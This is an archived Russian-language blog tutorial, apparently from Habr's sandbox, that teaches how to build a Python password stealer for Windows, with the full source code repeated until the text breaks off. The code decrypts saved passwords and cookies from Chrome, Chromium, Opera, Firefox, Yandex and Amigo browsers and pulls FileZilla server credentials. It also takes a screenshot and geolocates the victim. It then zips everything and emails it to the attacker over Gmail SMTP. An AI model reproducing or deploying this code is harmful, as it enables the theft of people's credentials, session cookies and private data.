{
	"id": "bfda659f-157b-4fdb-a9e9-8e6f1b803f1b",
	"created_at": "2026-04-06T00:12:09.58563Z",
	"updated_at": "2026-04-10T13:12:42.616811Z",
	"deleted_at": null,
	"sha1_hash": "8fed81b350197ad3e99eff56cda2e1e958498825",
	"title": "Стиллер паролей на python с отправкой на почту",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 291749,
	"plain_text": "Стиллер паролей на python с отправкой на почту\r\nPublished: 2019-12-13 · Archived: 2026-04-05 21:57:56 UTC\r\nInvite pending\r\nСтиллер паролей на python\r\nПривет, сейчас будем делать стиллер паролей на ЯП python. Наш стиллер будет воровать пароли браузеров\r\nтаких как хром, яндекс браузер, амиго, и др., их куки, делать скриншот экрана, узнавать айпи адрес пк на\r\nкотором открыли стиллер, его место нахождение и его установленная система.\r\nПриступим к делу\r\nСоздаем новый файл в IDLE Python или в другой IDE.\r\nПодключаем все нужные библиотеки. В некоторых нужно в cmd скачивать модули.\r\nhttps://habr.com/en/sandbox/135410/\r\nPage 1 of 20\n\nВсе нужные модули\r\npip install pyinstaller\r\npip install requests==2.7.0\r\npip install pywin32\r\npip install ip2geotools\r\npip install opencv-python\r\npip install Pillow\r\npip install db-sqlite3\r\npip install temp\r\nimport os\r\nfrom Crypto.Hash import SHA512\r\nimport sqlite3\r\nimport win32crypt\r\nimport email, ssl\r\nimport shutil\r\nimport requests\r\nimport zipfile\r\nimport getpass\r\nimport ip2geotools\r\nimport win32api\r\nimport platform\r\nimport tempfile\r\nimport smtplib\r\nimport time\r\nimport cv2\r\nimport sys\r\nfrom PIL import ImageGrab\r\nfrom email.mime.multipart import MIMEMultipart\r\nfrom email.mime.base import MIMEBase\r\nfrom email.message import Message\r\nfrom email.mime.multipart import MIMEBase\r\nfrom email.mime.text import MIMEText\r\nfrom email.utils import COMMASPACE, formatdate\r\nfrom email import encoders\r\nfrom Tools.demo.mcast import sender\r\nfrom ip2geotools.databases.noncommercial import DbIpCity\r\nfrom os.path import basename\r\nfrom smtplib import SMTP\r\nfrom email.header import Header\r\nfrom email.utils import parseaddr, formataddr\r\nfrom base64 import encodebytes\r\nimport random\r\nhttps://habr.com/en/sandbox/135410/\r\nPage 2 of 20\n\nСобираем с пользователя все его данные.\r\n################################################################################\r\n# ВСЕ ДАННЫЕ И ЛОКАЦИЯ #\r\n################################################################################\r\ndrives = str(win32api.GetLogicalDriveStrings())\r\ndrives = str(drives.split('\\000')[:-1])\r\nresponse = DbIpCity.get(requests.get(\"https://ramziv.com/ip\").text, api_key='free')\r\nall_data = \"Time: \" + time.asctime() + '\\n' + \"Кодировка ФС: \" + sys.getfilesystemencoding() + '\\n' + \"Cpu: \"\r\nfile = open(os.getenv(\"APPDATA\") + '\\\\alldata.txt', \"w+\") #создаем txt с его расположением\r\nfile.write(all_data)#записываем данные\r\nfile.close()#выходим\r\nСобираем пароли с хрома.\r\n################################################################################\r\n# GOOGLE PASSWORDS #\r\n################################################################################\r\ndef Chrome():\r\n text = 'Passwords Chrome:' + '\\n'\r\n text += 'URL | LOGIN | PASSWORD' + '\\n'\r\n if os.path.exists(os.getenv(\"LOCALAPPDATA\") + '\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Login Data'):\r\n shutil.copy2(os.getenv(\"LOCALAPPDATA\") + '\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Login Data', os.getenv(\"L\r\n conn = sqlite3.connect(os.getenv(\"LOCALAPPDATA\") + '\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Login Data2')\r\n cursor = conn.cursor()\r\n cursor.execute('SELECT action_url, username_value, password_value FROM logins')\r\n for result in cursor.fetchall():\r\n password = win32crypt.CryptUnprotectData(result[2])[1].decode()\r\n login = result[1]\r\n url = result[0]\r\n if password != '':\r\n text += url + ' | ' + login + ' | ' + password + '\\n'\r\n return text\r\nfile = open(os.getenv(\"APPDATA\") + '\\\\google_pass.txt', \"w+\") #создаем txt с его расположением\r\nfile.write(str(Chrome()) + '\\n')#записываем данные\r\nfile.close()\r\n#выходим\r\nСобираем куки с хрома.\r\n################################################################################\r\n# GOOGLE Cookies #\r\n################################################################################\r\ndef Chrome_cockie():\r\nhttps://habr.com/en/sandbox/135410/\r\nPage 3 of 20\n\ntextc = 'Cookies Chrome:' + '\\n'\r\n textc += 'URL | COOKIE | COOKIE NAME' + '\\n'\r\n if os.path.exists(os.getenv(\"LOCALAPPDATA\") + '\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Cookies'):\r\n shutil.copy2(os.getenv(\"LOCALAPPDATA\") + '\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Cookies', os.getenv(\"LOCA\r\n conn = sqlite3.connect(os.getenv(\"LOCALAPPDATA\") + '\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Cookies2')\r\n cursor = conn.cursor()\r\n cursor.execute(\"SELECT * from cookies\")\r\n for result in cursor.fetchall():\r\n cookie = win32crypt.CryptUnprotectData(result[12])[1].decode()\r\n name = result[2]\r\n url = result[1]\r\n textc += url + ' | ' + str(cookie) + ' | ' + name + '\\n'\r\n return textc\r\nfile = open(os.getenv(\"APPDATA\") + '\\\\google_cookies.txt', \"w+\")\r\nfile.write(str(Chrome_cockie()) + '\\n')\r\nfile.close()\r\nКуки с firefox.\r\n################################################################################\r\n# FIREFOX Cookies #\r\n################################################################################\r\ndef Firefox():\r\n textf = ''\r\n textf +='Firefox Cookies:' + '\\n'\r\n textf += 'URL | COOKIE | COOKIE NAME' + '\\n'\r\n for root, dirs, files in os.walk(os.getenv(\"APPDATA\") + '\\\\Mozilla\\\\Firefox\\\\Profiles'):\r\n for name in dirs:\r\n conn = sqlite3.connect(os.path.join(root, name)+'\\\\cookies.sqlite')\r\n cursor = conn.cursor()\r\n cursor.execute(\"SELECT baseDomain, value, name FROM moz_cookies\")\r\n data = cursor.fetchall()\r\n for i in range(len(data)):\r\n url, cookie, name = data[i]\r\n textf += url + ' | ' + str(cookie) + ' | ' + name + '\\n'\r\n break\r\n return textf\r\nfile = open(os.getenv(\"APPDATA\") + '\\\\firefox_cookies.txt', \"w+\")\r\nfile.write(str(Firefox()) + '\\n')\r\nfile.close()\r\nПароли с хромиума.\r\n################################################################################\r\n# CHROMIUM PASSWORDS #\r\n################################################################################\r\nhttps://habr.com/en/sandbox/135410/\r\nPage 4 of 20\n\ndef chromium():\r\n textch ='Chromium Passwords:' + '\\n'\r\n textch += 'URL | LOGIN | PASSWORD' + '\\n'\r\n if os.path.exists(os.getenv(\"LOCALAPPDATA\") + '\\\\Chromium\\\\User Data\\\\Default'):\r\n shutil.copy2(os.getenv(\"LOCALAPPDATA\") + '\\\\Chromium\\\\User Data\\\\Default\\\\Login Data', os.getenv(\"LOCALAP\r\n conn = sqlite3.connect(os.getenv(\"LOCALAPPDATA\") + '\\\\Chromium\\\\User Data\\\\Default\\\\Login Data2')\r\n cursor = conn.cursor()\r\n cursor.execute('SELECT action_url, username_value, password_value FROM logins')\r\n for result in cursor.fetchall():\r\n password = win32crypt.CryptUnprotectData(result[2])[1].decode()\r\n login = result[1]\r\n url = result[0]\r\n if password != '':\r\n textch += url + ' | ' + login + ' | ' + password + '\\n'\r\n return textch\r\nfile = open(os.getenv(\"APPDATA\") + '\\\\chromium.txt', \"w+\")\r\nfile.write(str(chromium()) + '\\n')\r\nfile.close()\r\nКуки с хромиума.\r\n################################################################################\r\n# CHROMIUM cookies #\r\n################################################################################\r\ndef chromiumc():\r\n textchc = ''\r\n textchc +='Chromium Cookies:' + '\\n'\r\n textchc += 'URL | COOKIE | COOKIE NAME' + '\\n'\r\n if os.path.exists(os.getenv(\"LOCALAPPDATA\") + '\\\\Chromium\\\\User Data\\\\Default\\\\Cookies'):\r\n shutil.copy2(os.getenv(\"LOCALAPPDATA\") + '\\\\Chromium\\\\User Data\\\\Default\\\\Cookies', os.getenv(\"LOCALAPPDA\r\n conn = sqlite3.connect(os.getenv(\"LOCALAPPDATA\") + '\\\\Chromium\\\\User Data\\\\Default\\\\Cookies2')\r\n cursor = conn.cursor()\r\n cursor.execute(\"SELECT * from cookies\")\r\n for result in cursor.fetchall():\r\n cookie = win32crypt.CryptUnprotectData(result[12])[1].decode()\r\n name = result[2]\r\n url = result[1]\r\n textchc += url + ' | ' + str(cookie) + ' | ' + name + '\\n'\r\n return textchc\r\nfile = open(os.getenv(\"APPDATA\") + '\\\\chromium_cookies.txt', \"w+\")\r\nfile.write(str(chromiumc()) + '\\n')\r\nfile.close()\r\nПароли с амиго.\r\nhttps://habr.com/en/sandbox/135410/\r\nPage 5 of 20\n\n################################################################################\r\n# AMIGO PASSWORDS #\r\n################################################################################\r\ndef Amigo():\r\n textam = 'Passwords Amigo:' + '\\n'\r\n textam += 'URL | LOGIN | PASSWORD' + '\\n'\r\n if os.path.exists(os.getenv(\"LOCALAPPDATA\") + '\\\\Amigo\\\\User Data\\\\Default\\\\Login Data'):\r\n shutil.copy2(os.getenv(\"LOCALAPPDATA\") + '\\\\Amigo\\\\User Data\\\\Default\\\\Login Data', os.getenv(\"LOCALAPPDA\r\n conn = sqlite3.connect(os.getenv(\"LOCALAPPDATA\") + '\\\\Amigo\\\\User Data\\\\Default\\\\Login Data2')\r\n cursor = conn.cursor()\r\n cursor.execute('SELECT action_url, username_value, password_value FROM logins')\r\n for result in cursor.fetchall():\r\n password = win32crypt.CryptUnprotectData(result[2])[1].decode()\r\n login = result[1]\r\n url = result[0]\r\n if password != '':\r\n textam += url + ' | ' + login + ' | ' + password + '\\n'\r\nfile = open(os.getenv(\"APPDATA\") + '\\\\amigo_pass.txt', \"w+\")\r\nfile.write(str(Amigo()) + '\\n')\r\nfile.close()\r\nКуки с амиго.\r\n################################################################################\r\n# AMIGO cookies #\r\n################################################################################\r\ndef Amigo_c():\r\n textamc = 'Cookies Amigo:' + '\\n'\r\n textamc += 'URL | COOKIE | COOKIE NAME' + '\\n'\r\n if os.path.exists(os.getenv(\"LOCALAPPDATA\") + '\\\\Amigo\\\\User Data\\\\Default\\\\Cookies'):\r\n shutil.copy2(os.getenv(\"LOCALAPPDATA\") + '\\\\Amigo\\\\User Data\\\\Default\\\\Cookies', os.getenv(\"LOCALAPPDATA\"\r\n conn = sqlite3.connect(os.getenv(\"LOCALAPPDATA\") + '\\\\Amigo\\\\User Data\\\\Default\\\\Cookies2')\r\n cursor = conn.cursor()\r\n cursor.execute(\"SELECT * from cookies\")\r\n for result in cursor.fetchall():\r\n cookie = win32crypt.CryptUnprotectData(result[12])[1].decode()\r\n name = result[2]\r\n url = result[1]\r\n textamc += url + ' | ' + str(cookie) + ' | ' + name + '\\n'\r\n return textamc\r\nfile = open(os.getenv(\"APPDATA\") + '\\\\amigo_cookies.txt', \"w+\")\r\nfile.write(str(Amigo_c()) + '\\n')\r\nfile.close()\r\nПароли с оперы.\r\nhttps://habr.com/en/sandbox/135410/\r\nPage 6 of 20\n\n################################################################################\r\n# OPERA PASSWORDS #\r\n################################################################################\r\ndef Opera():\r\n texto = 'Passwords Opera:' + '\\n'\r\n texto += 'URL | LOGIN | PASSWORD' + '\\n'\r\n if os.path.exists(os.getenv(\"APPDATA\") + '\\\\Opera Software\\\\Opera Stable\\\\Login Data'):\r\n shutil.copy2(os.getenv(\"APPDATA\") + '\\\\Opera Software\\\\Opera Stable\\\\Login Data', os.getenv(\"APPDATA\") +\r\n conn = sqlite3.connect(os.getenv(\"APPDATA\") + '\\\\Opera Software\\\\Opera Stable\\\\Login Data2')\r\n cursor = conn.cursor()\r\n cursor.execute('SELECT action_url, username_value, password_value FROM logins')\r\n for result in cursor.fetchall():\r\n password = win32crypt.CryptUnprotectData(result[2])[1].decode()\r\n login = result[1]\r\n url = result[0]\r\n if password != '':\r\n texto += url + ' | ' + login + ' | ' + password + '\\n'\r\nfile = open(os.getenv(\"APPDATA\") + '\\\\opera_pass.txt', \"w+\")\r\nfile.write(str(Opera()) + '\\n')\r\nfile.close()\r\nПароли с фаира.\r\n################################################################################\r\n# FIREFOX PASSWORDS #\r\n################################################################################\r\ndef Firefox_cookies():\r\n texto = 'Passwords firefox:' + '\\n'\r\n texto += 'URL | LOGIN | PASSWORD' + '\\n'\r\n if os.path.exists(os.getenv(\"APPDATA\") + '\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox'):\r\n shutil.copy2(os.getenv(\"APPDATA\") + '\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox2', os.getenv(\"APPDATA\") + '\\\\Ap\r\n conn = sqlite3.connect(os.getenv(\"APPDATA\") + '\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox2')\r\n cursor = conn.cursor()\r\n cursor.execute('SELECT action_url, username_value, password_value FROM logins')\r\n for result in cursor.fetchall():\r\n password = win32crypt.CryptUnprotectData(result[2])[1].decode()\r\n login = result[1]\r\n url = result[0]\r\n if password != '':\r\n texto += url + ' | ' + login + ' | ' + password + '\\n'\r\nfile = open(os.getenv(\"APPDATA\") + '\\\\firefox_pass.txt', \"w+\")\r\nfile.write(str(Firefox_cookies()) + '\\n')\r\nfile.close()\r\nПароли с яндекс браузера.\r\nhttps://habr.com/en/sandbox/135410/\r\nPage 7 of 20\n\n################################################################################\r\n# YANDEX PASSWORDS #\r\n################################################################################\r\ndef Yandexpass():\r\n textyp = 'Passwords Yandex:' + '\\n'\r\n textyp += 'URL | LOGIN | PASSWORD' + '\\n'\r\n if os.path.exists(os.getenv(\"LOCALAPPDATA\") + '\\\\Yandex\\\\YandexBrowser\\\\User Data\\\\Default\\\\Ya Login Data.db\r\n shutil.copy2(os.getenv(\"LOCALAPPDATA\") + '\\\\Yandex\\\\YandexBrowser\\\\User Data\\\\Default\\\\Ya Login Data.db'\r\n conn = sqlite3.connect(os.getenv(\"LOCALAPPDATA\") + '\\\\Yandexe\\\\YandexBrowser\\\\User Data\\\\Default\\\\Ya Log\r\n cursor = conn.cursor()\r\n cursor.execute('SELECT action_url, username_value, password_value FROM logins')\r\n for result in cursor.fetchall():\r\n password = win32crypt.CryptUnprotectData(result[2])[1].decode()\r\n login = result[1]\r\n url = result[0]\r\n if password != '':\r\n textyp += url + ' | ' + login + ' | ' + password + '\\n'\r\n return textyp\r\nfile = open(os.getenv(\"APPDATA\") + '\\\\yandex_passwords.txt', \"w+\")\r\nfile.write(str(Yandexpass()) + '\\n')\r\nfile.close()\r\nКуки с оперы.\r\n################################################################################\r\n# OPERA cookies #\r\n################################################################################\r\ndef Opera_c():\r\n textoc ='Cookies Opera:' + '\\n'\r\n textoc += 'URL | COOKIE | COOKIE NAME' + '\\n'\r\n if os.path.exists(os.getenv(\"LOCALAPPDATA\") + '\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Cookies'):\r\n shutil.copy2(os.getenv(\"LOCALAPPDATA\") + '\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Cookies', os.getenv(\"LOCAL\r\n conn = sqlite3.connect(os.getenv(\"LOCALAPPDATA\") + '\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Cookies2')\r\n cursor = conn.cursor()\r\n cursor.execute(\"SELECT * from cookies\")\r\n for result in cursor.fetchall():\r\n cookie = win32crypt.CryptUnprotectData(result[12])[1].decode()\r\n name = result[2]\r\n url = result[1]\r\n textoc += url + ' | ' + str(cookie) + ' | ' + name + '\\n'\r\n return textoc\r\nfile = open(os.getenv(\"APPDATA\") + '\\\\opera_cookies.txt', \"w+\")\r\nfile.write(str(Opera_c()) + '\\n')\r\nfile.close()\r\nhttps://habr.com/en/sandbox/135410/\r\nPage 8 of 20\n\nДанные с FILEZILLA.\r\n################################################################################\r\n# FILEZILLA #\r\n################################################################################\r\ndef filezilla():\r\n try:\r\n data = ''\r\n if os.path.isfile(os.getenv(\"APPDATA\") + '\\\\FileZilla\\\\recentservers.xml') is True:\r\n root = etree.parse(os.getenv(\"APPDATA\") + '\\\\FileZilla\\\\recentservers.xml').getroot()\r\n for i in range(len(root[0])):\r\n host = root[0][i][0].text\r\n port = root[0][i][1].text\r\n user = root[0][i][4].text\r\n password = base64.b64decode(root[0][i][5].text).decode('utf-8')\r\n data += 'host: ' + host + '|port: ' + port + '|user: ' + user + '|pass: ' + password + '\\n'\r\n return data\r\n else:\r\n return 'Not found'\r\n except Exception:\r\n return 'Error'\r\ntextfz = filezilla()\r\ntextfz += 'Filezilla: ' + '\\n' + filezilla() + '\\n'\r\nfile = open(os.getenv(\"APPDATA\") + '\\\\filezilla.txt', \"w+\")\r\nfile.write(str(filezilla()) + '\\n')\r\nfile.close()\r\nДелаем скриншот экрана.\r\n################################################################################\r\n# SCREEN #\r\n################################################################################\r\nscreen = ImageGrab.grab()\r\nscreen.save(os.getenv(\"APPDATA\") + '\\\\sreenshot.jpg')\r\nТут записываем наши тхт в один ZIP — doc.\r\n################################################################################\r\n# PACKING TO ZIP #\r\n################################################################################\r\nzname = r'C:\\\\Users\\\\' + getpass.getuser() + '\\\\AppData\\\\Local\\\\Temp\\\\LOG.zip'\r\nNZ = zipfile.ZipFile(zname,'w')\r\nNZ.write(r'C:\\\\Users\\\\' + getpass.getuser() + '\\\\AppData\\\\Roaming\\\\firefox_pass.txt')\r\nNZ.write(r'C:\\\\Users\\\\' + getpass.getuser() + '\\\\AppData\\\\Roaming\\\\firefox_cookies.txt')\r\nNZ.write(r'C:\\\\Users\\\\' + getpass.getuser() + '\\\\AppData\\\\Roaming\\\\yandex_passwords.txt')\r\nhttps://habr.com/en/sandbox/135410/\r\nPage 9 of 20\n\nNZ.write(r'C:\\\\Users\\\\' + getpass.getuser() + '\\\\AppData\\\\Roaming\\\\alldata.txt')\r\nNZ.write(r'C:\\\\Users\\\\' + getpass.getuser() + '\\\\AppData\\\\Roaming\\\\google_pass.txt')\r\nNZ.write(r'C:\\\\Users\\\\' + getpass.getuser() + '\\\\AppData\\\\Roaming\\\\google_cookies.txt')\r\nNZ.write(r'C:\\\\Users\\\\' + getpass.getuser() + '\\\\AppData\\\\Roaming\\\\chromium.txt')\r\nNZ.write(r'C:\\\\Users\\\\' + getpass.getuser() + '\\\\AppData\\\\Roaming\\\\chromium_cookies.txt')\r\nNZ.write(r'C:\\\\Users\\\\' + getpass.getuser() + '\\\\AppData\\\\Roaming\\\\amigo_pass.txt')\r\nNZ.write(r'C:\\\\Users\\\\' + getpass.getuser() + '\\\\AppData\\\\Roaming\\\\amigo_cookies.txt')\r\nNZ.write(r'C:\\\\Users\\\\' + getpass.getuser() + '\\\\AppData\\\\Roaming\\\\opera_pass.txt')\r\nNZ.write(r'C:\\\\Users\\\\' + getpass.getuser() + '\\\\AppData\\\\Roaming\\\\opera_cookies.txt')\r\nNZ.write(r'C:\\\\Users\\\\' + getpass.getuser() + '\\\\AppData\\\\Roaming\\\\filezilla.txt')\r\nNZ.write(r'C:\\\\Users\\\\' + getpass.getuser() + '\\\\AppData\\\\Roaming\\\\sreenshot.jpg')\r\nNZ.close()\r\nВот он наш ZIP по всеми данными.\r\n################################################################################\r\n# DOC-НАШ ZIP #\r\n################################################################################\r\ndoc = 'C:\\\\Users\\\\' + getpass.getuser() + '\\\\AppData\\\\Local\\\\Temp\\\\LOG.zip'\r\nОформляем отправку.\r\n################################################################################\r\n# ОТПРАВКА #\r\n################################################################################\r\n'↑Stealler by Andrew_Shipunov↑'.encode('utf-8')\r\nmsgtext = MIMEText('↑Stealler by Andrew_Shipunov↑'.encode('utf-8'), 'plain', 'utf-8')\r\nmsg = MIMEMultipart()\r\nmsg['From'] = 'тут ваша новая почта с которой отправится'\r\nmsg['To'] = 'почта на которую отправится'\r\nmsg['Subject'] = getpass.getuser() + '-PC'\r\nmsg.attach(msgtext)\r\nТут мы создаем вложение для нашего doc'а ZIP.\r\n################################################################################\r\n# СОЗДАНИЕ Вложения #\r\n################################################################################\r\npart = MIMEBase('application', \"zip\")\r\nb = open(doc, \"rb\").read()\r\nbs = encodebytes(b).decode()\r\npart.set_payload(bs)\r\npart.add_header('Content-Transfer-Encoding', 'base64')\r\nhttps://habr.com/en/sandbox/135410/\r\nPage 10 of 20\n\npart.add_header('Content-Disposition', 'attachment; filename=\"LOG.zip\"')\r\nmsg.attach(part)\r\nЗдесь мы собственно производим отправку на емаил с помощью SMTP\r\n################################################################################\r\n# ОТПРАВКА ВАМ #\r\n################################################################################\r\ns = smtplib.SMTP('smtp.gmail.com', 587)#ваш почтовый сервис,советую создавать новую гмаил\r\ns.starttls()\r\ns.login('тут ваша новая почта с которой отправится', 'тут пароль от новой почты')\r\ns.sendmail('тут ваша новая почта с которой отправится', 'почта на которую отправится', msg.as_string())\r\ns.quit()\r\ni = input()\r\nЧтобы отправилось сообщение с вашей новой почты gmail нужно проделать это:\r\nНа странице «Аккаунт Google» откройте раздел Ненадежные приложения, у которых есть доступ к\r\nаккаунту, и включите. Тогда все будет ОК.\r\nВесь код\r\nimport os\r\nfrom Crypto.Hash import SHA512\r\nimport sqlite3\r\nimport win32crypt\r\nimport email, ssl\r\nimport shutil\r\nimport requests\r\nimport zipfile\r\nimport getpass\r\nimport ip2geotools\r\nimport win32api\r\nimport platform\r\nimport tempfile\r\nimport smtplib\r\nimport time\r\nimport cv2\r\nimport sys\r\nfrom PIL import ImageGrab\r\nfrom email.mime.multipart import MIMEMultipart\r\nfrom email.mime.base import MIMEBase\r\nfrom email.message import Message\r\nfrom email.mime.multipart import MIMEBase\r\nfrom email.mime.text import MIMEText\r\nfrom email.utils import COMMASPACE, formatdate\r\nfrom email import encoders\r\nhttps://habr.com/en/sandbox/135410/\r\nPage 11 of 20\n\nfrom Tools.demo.mcast import sender\r\nfrom ip2geotools.databases.noncommercial import DbIpCity\r\nfrom os.path import basename\r\nfrom smtplib import SMTP\r\nfrom email.header import Header\r\nfrom email.utils import parseaddr, formataddr\r\nfrom base64 import encodebytes\r\nimport random\r\n################################################################################\r\n# ВСЕ ДАННЫЕ И ЛОКАЦИЯ #\r\n################################################################################\r\ndrives = str(win32api.GetLogicalDriveStrings())\r\ndrives = str(drives.split('\\000')[:-1])\r\nresponse = DbIpCity.get(requests.get(\"https://ramziv.com/ip\").text, api_key='free')\r\nall_data = \"Time: \" + time.asctime() + '\\n' + \"Кодировка ФС: \" + sys.getfilesystemencoding() + '\\n' + \"Cpu: \"\r\nfile = open(os.getenv(\"APPDATA\") + '\\\\alldata.txt', \"w+\")\r\nfile.write(all_data)\r\nfile.close()\r\n################################################################################\r\n# GOOGLE PASSWORDS #\r\n################################################################################\r\ndef Chrome():\r\n text = 'Passwords Chrome:' + '\\n'\r\n text += 'URL | LOGIN | PASSWORD' + '\\n'\r\n if os.path.exists(os.getenv(\"LOCALAPPDATA\") + '\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Login Data'):\r\n shutil.copy2(os.getenv(\"LOCALAPPDATA\") + '\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Login Data', os.getenv(\"L\r\n conn = sqlite3.connect(os.getenv(\"LOCALAPPDATA\") + '\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Login Data2')\r\n cursor = conn.cursor()\r\n cursor.execute('SELECT action_url, username_value, password_value FROM logins')\r\n for result in cursor.fetchall():\r\n password = win32crypt.CryptUnprotectData(result[2])[1].decode()\r\n login = result[1]\r\n url = result[0]\r\n if password != '':\r\n text += url + ' | ' + login + ' | ' + password + '\\n'\r\n return text\r\nfile = open(os.getenv(\"APPDATA\") + '\\\\google_pass.txt', \"w+\")\r\nfile.write(str(Chrome()) + '\\n')\r\nfile.close()\r\n################################################################################\r\n# GOOGLE Cookies #\r\n################################################################################\r\ndef Chrome_cockie():\r\n textc = 'Cookies Chrome:' + '\\n'\r\n textc += 'URL | COOKIE | COOKIE NAME' + '\\n'\r\n if os.path.exists(os.getenv(\"LOCALAPPDATA\") + '\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Cookies'):\r\n shutil.copy2(os.getenv(\"LOCALAPPDATA\") + '\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Cookies', os.getenv(\"LOCA\r\nhttps://habr.com/en/sandbox/135410/\r\nPage 12 of 20\n\nconn = sqlite3.connect(os.getenv(\"LOCALAPPDATA\") + '\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Cookies2')\r\n cursor = conn.cursor()\r\n cursor.execute(\"SELECT * from cookies\")\r\n for result in cursor.fetchall():\r\n cookie = win32crypt.CryptUnprotectData(result[12])[1].decode()\r\n name = result[2]\r\n url = result[1]\r\n textc += url + ' | ' + str(cookie) + ' | ' + name + '\\n'\r\n return textc\r\nfile = open(os.getenv(\"APPDATA\") + '\\\\google_cookies.txt', \"w+\")\r\nfile.write(str(Chrome_cockie()) + '\\n')\r\nfile.close()\r\n################################################################################\r\n# FIREFOX Cookies #\r\n################################################################################\r\ndef Firefox():\r\n textf = ''\r\n textf +='Firefox Cookies:' + '\\n'\r\n textf += 'URL | COOKIE | COOKIE NAME' + '\\n'\r\n for root, dirs, files in os.walk(os.getenv(\"APPDATA\") + '\\\\Mozilla\\\\Firefox\\\\Profiles'):\r\n for name in dirs:\r\n conn = sqlite3.connect(os.path.join(root, name)+'\\\\cookies.sqlite')\r\n cursor = conn.cursor()\r\n cursor.execute(\"SELECT baseDomain, value, name FROM moz_cookies\")\r\n data = cursor.fetchall()\r\n for i in range(len(data)):\r\n url, cookie, name = data[i]\r\n textf += url + ' | ' + str(cookie) + ' | ' + name + '\\n'\r\n break\r\n return textf\r\nfile = open(os.getenv(\"APPDATA\") + '\\\\firefox_cookies.txt', \"w+\")\r\nfile.write(str(Firefox()) + '\\n')\r\nfile.close()\r\n################################################################################\r\n# CHROMIUM PASSWORDS #\r\n################################################################################\r\ndef chromium():\r\n textch ='Chromium Passwords:' + '\\n'\r\n textch += 'URL | LOGIN | PASSWORD' + '\\n'\r\n if os.path.exists(os.getenv(\"LOCALAPPDATA\") + '\\\\Chromium\\\\User Data\\\\Default'):\r\n shutil.copy2(os.getenv(\"LOCALAPPDATA\") + '\\\\Chromium\\\\User Data\\\\Default\\\\Login Data', os.getenv(\"LOCALAP\r\n conn = sqlite3.connect(os.getenv(\"LOCALAPPDATA\") + '\\\\Chromium\\\\User Data\\\\Default\\\\Login Data2')\r\n cursor = conn.cursor()\r\n cursor.execute('SELECT action_url, username_value, password_value FROM logins')\r\n for result in cursor.fetchall():\r\n password = win32crypt.CryptUnprotectData(result[2])[1].decode()\r\n login = result[1]\r\nhttps://habr.com/en/sandbox/135410/\r\nPage 13 of 20\n\nurl = result[0]\r\n if password != '':\r\n textch += url + ' | ' + login + ' | ' + password + '\\n'\r\n return textch\r\nfile = open(os.getenv(\"APPDATA\") + '\\\\chromium.txt', \"w+\")\r\nfile.write(str(chromium()) + '\\n')\r\nfile.close()\r\n################################################################################\r\n# CHROMIUM cookies #\r\n################################################################################\r\ndef chromiumc():\r\n textchc = ''\r\n textchc +='Chromium Cookies:' + '\\n'\r\n textchc += 'URL | COOKIE | COOKIE NAME' + '\\n'\r\n if os.path.exists(os.getenv(\"LOCALAPPDATA\") + '\\\\Chromium\\\\User Data\\\\Default\\\\Cookies'):\r\n shutil.copy2(os.getenv(\"LOCALAPPDATA\") + '\\\\Chromium\\\\User Data\\\\Default\\\\Cookies', os.getenv(\"LOCALAPPDA\r\n conn = sqlite3.connect(os.getenv(\"LOCALAPPDATA\") + '\\\\Chromium\\\\User Data\\\\Default\\\\Cookies2')\r\n cursor = conn.cursor()\r\n cursor.execute(\"SELECT * from cookies\")\r\n for result in cursor.fetchall():\r\n cookie = win32crypt.CryptUnprotectData(result[12])[1].decode()\r\n name = result[2]\r\n url = result[1]\r\n textchc += url + ' | ' + str(cookie) + ' | ' + name + '\\n'\r\n return textchc\r\nfile = open(os.getenv(\"APPDATA\") + '\\\\chromium_cookies.txt', \"w+\")\r\nfile.write(str(chromiumc()) + '\\n')\r\nfile.close()\r\n################################################################################\r\n# AMIGO PASSWORDS #\r\n################################################################################\r\ndef Amigo():\r\n textam = 'Passwords Amigo:' + '\\n'\r\n textam += 'URL | LOGIN | PASSWORD' + '\\n'\r\n if os.path.exists(os.getenv(\"LOCALAPPDATA\") + '\\\\Amigo\\\\User Data\\\\Default\\\\Login Data'):\r\n shutil.copy2(os.getenv(\"LOCALAPPDATA\") + '\\\\Amigo\\\\User Data\\\\Default\\\\Login Data', os.getenv(\"LOCALAPPDA\r\n conn = sqlite3.connect(os.getenv(\"LOCALAPPDATA\") + '\\\\Amigo\\\\User Data\\\\Default\\\\Login Data2')\r\n cursor = conn.cursor()\r\n cursor.execute('SELECT action_url, username_value, password_value FROM logins')\r\n for result in cursor.fetchall():\r\n password = win32crypt.CryptUnprotectData(result[2])[1].decode()\r\n login = result[1]\r\n url = result[0]\r\n if password != '':\r\n textam += url + ' | ' + login + ' | ' + password + '\\n'\r\nfile = open(os.getenv(\"APPDATA\") + '\\\\amigo_pass.txt', \"w+\")\r\nfile.write(str(Amigo()) + '\\n')\r\nhttps://habr.com/en/sandbox/135410/\r\nPage 14 of 20\n\nfile.close()\r\n################################################################################\r\n# AMIGO cookies #\r\n################################################################################\r\ndef Amigo_c():\r\n textamc = 'Cookies Amigo:' + '\\n'\r\n textamc += 'URL | COOKIE | COOKIE NAME' + '\\n'\r\n if os.path.exists(os.getenv(\"LOCALAPPDATA\") + '\\\\Amigo\\\\User Data\\\\Default\\\\Cookies'):\r\n shutil.copy2(os.getenv(\"LOCALAPPDATA\") + '\\\\Amigo\\\\User Data\\\\Default\\\\Cookies', os.getenv(\"LOCALAPPDATA\"\r\n conn = sqlite3.connect(os.getenv(\"LOCALAPPDATA\") + '\\\\Amigo\\\\User Data\\\\Default\\\\Cookies2')\r\n cursor = 